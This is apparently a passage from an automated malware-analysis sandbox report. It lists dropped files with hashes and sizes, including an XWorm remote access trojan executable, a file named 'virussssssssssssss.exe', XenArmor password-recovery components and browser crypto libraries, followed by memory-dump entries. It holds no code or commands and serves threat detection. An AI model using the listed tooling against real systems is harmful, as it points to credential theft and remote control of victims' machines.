fefb98394cb9ef4368da798deab00e21

SHA1
316d86926b558c9f3f6133739c1a8477b9e60740

SHA256
b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7

SHA512
57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-string-l1-1-0.dll

Filesize
22KB

MD5
404604cd100a1e60dfdaf6ecf5ba14c0

SHA1
58469835ab4b916927b3cabf54aee4f380ff6748

SHA256
73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c

SHA512
da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-time-l1-1-0.dll

Filesize
20KB

MD5
849f2c3ebf1fcba33d16153692d5810f

SHA1
1f8eda52d31512ebfdd546be60990b95c8e28bfb

SHA256
69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d

SHA512
44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-utility-l1-1-0.dll

Filesize
18KB

MD5
b52a0ca52c9c207874639b62b6082242

SHA1
6fb845d6a82102ff74bd35f42a2844d8c450413b

SHA256
a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0

SHA512
18834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\freebl3.dll

Filesize
324KB

MD5
04a2ba08eb17206b7426cb941f39250b

SHA1
731ac2b533724d9f540759d84b3e36910278edba

SHA256
8e5110ce03826f680f30013985be49ebd8fc672de113fc1d9a566eced149b8c4

SHA512
e6e90b4becf472b2e8f716dbb962cd7de61676fcce342c735fccdc01268b5a221139bc9be0e0c9722e9978aefaae79c10bc49c43392aa05dd12244b3147aeffc

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\mozglue.dll

Filesize
135KB

MD5
591533ca4655646981f759d95f75ae3d

SHA1
b4a02f18e505a1273f7090a9d246bc953a2cb792

SHA256
4434f4223d24fb6e2f5840dd6c1eedef2875e11abe24e4b0e9bc1507f8f6fd47

SHA512
915b124ad595ee78feab8f3c9be7e80155445e58ed4c88b89665df5fb7e0a04e973374a01f97bb67aaa733a8ce2e91a9f92605ec96251906e0fb2750a719b579

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\msvcp140.dll

Filesize
429KB

MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\nss3.dll

Filesize
1.2MB

MD5
fc57d044bfd635997415c5f655b5fffa

SHA1
1b5162443d985648ef64e4aab42089ad4c25f856

SHA256
17f8c55eba797bbc80c8c32ca1a3a7588415984386be56f4b4cdefd4176fb4c3

SHA512
f5a944230000730bc0aad10e6607e3389d9d82a0a4ab1b72a19d32e94e8572789d46fb4acd75ad48f17e2bbc27389d432086696f2ccc899850ff9177d6823efb

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\softokn3.dll

Filesize
140KB

MD5
1b304dad157edc24e397629c0b688a3e

SHA1
ae151af384675125dfbdc96147094cff7179b7da

SHA256
8f0c9ac7134773d11d402e49daa90958fe00205e83a7389f7a58da03892d20cb

SHA512
2dc625dbdf2aae4ade600cca688eb5280200e8d7c2dfc359590435afe0926b3a7446cc56a66023ee834366132a68ae68da51a5079e4f107201e2050f5c5512ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\vcruntime140.dll

Filesize
81KB

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\Components\nspr4.dll

Filesize
72KB

MD5
72414dfb0b112c664d2c8d1215674e09

SHA1
50a1e61309741e92fe3931d8eb606f8ada582c0a

SHA256
69e73fea2210adc2ae0837ac98b46980a09fe91c07f181a28fda195e2b9e6b71

SHA512
41428624573b4a191b33657ed9ad760b500c5640f3d62b758869a17857edc68f90bc10d7a5e720029519c0d49b5ca0fa8579743e80b200ef331e41efde1dc8c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\Components\nss3.dll

Filesize
172KB

MD5
7ddbd64d87c94fd0b5914688093dd5c2

SHA1
d49d1f79efae8a5f58e6f713e43360117589efeb

SHA256
769703fb1ba6c95fb6c889e8a9baaea309e62d0f3ca444d01cc6b495c0f722d1

SHA512
60eaad58c3c4894f1673723eb28ddb42b681ff7aafe7a29ff8bf87a2da6595c16d1f8449096accdb89bd6cda6454eb90470e71dde7c5bd16abd0f80e115cfa2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\Components\plc4.dll

Filesize
8KB

MD5
c73ec58b42e66443fafc03f3a84dcef9

SHA1
5e91f467fe853da2c437f887162bccc6fd9d9dbe

SHA256
2dc0171b83c406db6ec9389b438828246b282862d2b8bdf2f5b75aec932a69f7

SHA512
6318e831d8f38525e2e49b5a1661440cd8b1f3d2afc6813bb862c21d88d213c4675a8ec2a413b14fbdca896c63b65a7da6ec9595893b352ade8979e7e86a7fcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\Components\plds4.dll

Filesize
6KB

MD5
ee44d5d780521816c906568a8798ed2f

SHA1
2da1b06d5de378cbfc7f2614a0f280f59f2b1224

SHA256
50b2735318233d6c87b6efccccc23a0e3216d2870c67f2f193cc1c83c7c879fc

SHA512
634a1cd2baaef29b4fe7c7583c04406bb2ea3a3c93294b31f621652844541e7c549da1a31619f657207327604c261976e15845571ee1efe5416f1b021d361da8

Download Submit
C:\Users\Admin\AppData\Local\Temp\External\Components\softokn3.dll

Filesize
155KB

MD5
e846285b19405b11c8f19c1ed0a57292

SHA1
2c20cf37394be48770cd6d396878a3ca70066fd0

SHA256
251f0094b6b6537df3d3ce7c2663726616f06cfb9b6de90efabd67de2179a477

SHA512
b622ff07ae2f77e886a93987a9a922e80032e9041ed41503f0e38abb8c344eb922d154ade29e52454d0a1ad31596c4085f4bd942e4412af9f0698183acd75db7

Download Submit
C:\Users\Admin\AppData\Local\Temp\License.XenArmor

Filesize
104B

MD5
774a9a7b72f7ed97905076523bdfe603

SHA1
946355308d2224694e0957f4ebf6cdba58327370

SHA256
76e56835b1ac5d7a8409b7333826a2353401cf67f3bd95c733adc6aa8d9fec81

SHA512
c5c77c6827c72901494b3a368593cb9a990451664b082761294a845c0cd9441d37e5e9ac0e82155cb4d97f29507ffc8e26d6ff74009666c3075578aa18b28675

Download Submit
C:\Users\Admin\AppData\Local\Temp\XenManager.dll

Filesize
2.0MB

MD5
7a5c53a889c4bf3f773f90b85af5449e

SHA1
25b2928c310b3068b629e9dca38c7f10f6adc5b6

SHA256
baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c

SHA512
f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah4vzqte.3oh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\settings.db

Filesize
20KB

MD5
56b941f65d270f2bf397be196fcf4406

SHA1
244f2e964da92f7ef7f809e5ce0b3191aeab084a

SHA256
00c020ba1cce022364976f164c575993cb3b811c61b5b4e05a8a0c3d1b560c0c

SHA512
52ad8c7ed497a5b8eed565b3abcbf544841f3c8c9ec3ca8f686846a2afd15ac4ac8b16abf1cb14aeca1a2fb31f3086ad17206ec4af28e77bae600dca15e8deab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe

Filesize
25.0MB

MD5
c0b4c6349df031081dd6aee3f25a1c9b

SHA1
82f164fdff783d2a02ae6db9e6d71d4c40a8acf7

SHA256
f13c9eb085bec9239557753ab617404e60a035422194550fb56c2df96bf00670

SHA512
63a18a2d0d894946d32a97f2e2112509b0ad54b4d5e4c04123c1c278f35669a909588d0d3036a054d544eedc6aa3025b8edd1560950e45749ee9f2db2277f69b

Download Submit
C:\Users\Admin\Downloads\virussssssssssssss.exe

Filesize
47KB

MD5
7fe792eccf6b58c1af6bda06fab86629

SHA1
9917d5cdb88313d514d9f6b02f316d01d2573d15

SHA256
c816e79c14bae72f6d154e0fd8bc0306837ebcd1cf4d53da2f62ac3cd83ef341

SHA512
301c5019196f16c243ce4e0ef8cc3b7ded91c004ee3d0bca876abf4edcd489c6c48f66e5f70c609ad1e2956ec2d27e40641e6d4d7edfe2d842a6eceedb7cb096

Download Submit
C:\Windows\Progman.exe

Filesize
6.3MB

MD5
8ec2fd013c3aceee5a693c588eb23aaf

SHA1
7a1694010b5663343b8688a2d2a875c515651b66

SHA256
0e09fbf7d729e95eeb76a8afccf4a7d7b92c68e8eed551b8f4f8edc39e7ba631

SHA512
820f1978c5f26276122c8f5063a9d5cd1ff8420ce3af85fbff22cdff5964fbb0a396cb6af2113f1bea0d82a758183252a1f3fdb0a5a9db15d1b2657138859dde

Download Submit
memory/2020-312-0x0000000140000000-0x00000001407A1000-memory.dmp

Filesize
7.6MB

Download
memory/2212-1026-0x0000000002830000-0x000000000283E000-memory.dmp

Filesize
56KB

Download
memory/2212-1029-0x000000001B350000-0x000000001B35A000-memory.dmp

Filesize
40KB

Download
memory/2212-975-0x00000000007A0000-0x00000000007B2000-memory.dmp

Filesize
72KB

Download
memory/2212-1222-0x000000001B780000-0x000000001B78A000-memory.dmp

Filesize
40KB

Download
memory/2212-1030-0x000000001C220000-0x000000001C6F4000-memory.dmp

Filesize
4.8MB

Download
memory/2828-390-0x00000182ABAC0000-0x00000182ABB42000-memory.dmp

Filesize
520KB

Download
memory/2828-393-0x00000182AC030000-0x00000182AC198000-memory.dmp

Filesize
1.4MB

Download
memory/2828-392-0x00000182918E0000-0x00000182918E8000-memory.dmp

Filesize
32KB

Download
memory/2828-391-0x00000182ABB50000-0x00000182ABBAA000-memory.dmp

Filesize
360KB

Download
memory/2828-394-0x00000182ABEC0000-0x00000182ABF72000-memory.dmp

Filesize
712KB

Download
memory/2828-388-0x0000018291A50000-0x0000018291A7C000-memory.dmp

Filesize
176KB

Download
memory/2828-395-0x00000182AC4A0000-0x00000182ACDD6000-memory.dmp

Filesize
9.2MB

Download
memory/2828-389-0x00000182AC1B0000-0x00000182AC492000-memory.dmp

Filesize
2.9MB

Download
memory/2828-387-0x00000182ABCC0000-0x00000182ABEB4000-memory.dmp

Filesize
2.0MB

Download
memory/2828-386-0x00000182918B0000-0x00000182918B1000-memory.dmp

Filesize
4KB

Download
memory/2828-385-0x000001828E2A0000-0x0000018291518000-memory.dmp

Filesize
50.5MB

Download
memory/2828-396-0x00000182ACDE0000-0x00000182AD9CC000-memory.dmp

Filesize
11.9MB

Download
memory/4748-324-0x000002085ADB0000-0x000002085ADD2000-memory.dmp

Filesize
136KB

Download